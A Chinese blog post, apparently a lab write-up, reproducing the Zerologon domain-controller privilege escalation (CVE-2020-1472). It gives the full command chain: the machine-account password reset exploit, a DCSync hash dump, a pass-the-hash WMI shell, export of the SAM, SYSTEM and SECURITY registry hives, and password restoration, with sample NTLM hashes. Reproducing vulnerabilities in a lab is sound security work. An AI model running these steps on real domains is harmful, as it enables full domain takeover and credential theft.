NetLogon 域內(nèi)提權(quán)漏洞(CVE-2020-1472)

NetLogon 域內(nèi)提權(quán)漏洞(CVE-2020-1472)復(fù)現(xiàn)

摘要

2020年08月12日,Windows官方 發(fā)布了 NetLogon 特權(quán)提升漏洞 的風(fēng)險(xiǎn)通告,該漏洞編號(hào)為 CVE-2020-1472,漏洞等級(jí):嚴(yán)重,漏洞評(píng)分:10分

攻擊者通過NetLogon(MS-NRPC),建立與域控間易受攻擊的安全通道時(shí),可利用此漏洞獲取域管訪問權(quán)限。成功利用此漏洞的攻擊者可以在該網(wǎng)絡(luò)中的設(shè)備上運(yùn)行經(jīng)特殊設(shè)計(jì)的應(yīng)用程序

影響版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

復(fù)現(xiàn)環(huán)境

版本: Windows Server 2012
IP: 10.99.99.253
Blosname: OWA2013   (域控的主機(jī)名)

漏洞腳本

impacket               https://github.com/SecureAuthCorp/impacket
重置域內(nèi)管理員密碼poc    https://github.com/dirkjanm/CVE-2020-1472
恢復(fù)密碼poc             https://github.com/risksense/zerologon

復(fù)現(xiàn)開始

首先使用exp重置管理員密鑰

python3 cve-2020-1472-exploit.py OWA2013 10.99.99.253

通過 Dcsync獲取域內(nèi)所有有用戶hash

python3 secretsdump.py rootkit/OWA2013\$@10.99.99.253 -just-dc -no-pass

得到了域控的 Hash:

rootkit.org\Administrator:500:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c:::

通過 wmic hash 傳遞獲取shell:

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c rootkit.org/Administrator@10.99.99.253

通過導(dǎo)出 sam system 等文件到本地,獲取域控機(jī)器上本地保存之前的 hash 值用于恢復(fù),不然就脫域了:

備份注冊(cè)表

導(dǎo)出注冊(cè)表文件
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

將文件下載到本地
get system.save
get sam.save
get security.save

刪除文件
del /f system.save
del /f sam.save
del /f security.save

之后你會(huì)發(fā)現(xiàn)再你的當(dāng)前機(jī)器會(huì)生成幾個(gè)文件:sam.save、security.save、system.save


之后通過 sam.save、security.save、system.save 這些文件獲得原來域控機(jī)器上的 Ntlm Hash 值,用于恢復(fù)密碼:

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

通過拿到 $MACHINE.ACC: 的值,然后進(jìn)行恢復(fù)(注意只有后半部分)

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:7e304360db8cdb95d09a960607fcc526

恢復(fù)密碼

python3 reinstall_original_pw.py OWA2013 10.99.99.253 7e304360db8cdb95d09a960607fcc526

驗(yàn)證是否恢復(fù)密碼成功

python3 secretsdump.py rootkit/OWA2013\$@10.99.99.253 -just-dc -no-pass
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 實(shí)驗(yàn)環(huán)境 操作機(jī):Windows XP目標(biāo)機(jī):Kali 1.1.0目標(biāo)服務(wù)器:172.16.12.2 實(shí)驗(yàn)工具 v...
    njukay閱讀 4,515評(píng)論 0 50
  • 前言 提權(quán)何須收集各種EXP,一個(gè)MSF就夠了,本文為大家?guī)鞰SF綜合提權(quán)的一些姿勢(shì)。 文章內(nèi)容: 學(xué)習(xí)`Met...
    欽玄閱讀 9,262評(píng)論 1 9
  • 我是黑夜里大雨紛飛的人啊 1 “又到一年六月,有人笑有人哭,有人歡樂有人憂愁,有人驚喜有人失落,有的覺得收獲滿滿有...
    陌忘宇閱讀 8,899評(píng)論 28 54
  • 信任包括信任自己和信任他人 很多時(shí)候,很多事情,失敗、遺憾、錯(cuò)過,源于不自信,不信任他人 覺得自己做不成,別人做不...
    吳氵晃閱讀 6,394評(píng)論 4 8
  • 步驟:發(fā)微博01-導(dǎo)航欄內(nèi)容 -> 發(fā)微博02-自定義TextView -> 發(fā)微博03-完善TextView和...
    dibadalu閱讀 3,430評(píng)論 1 3

友情鏈接更多精彩內(nèi)容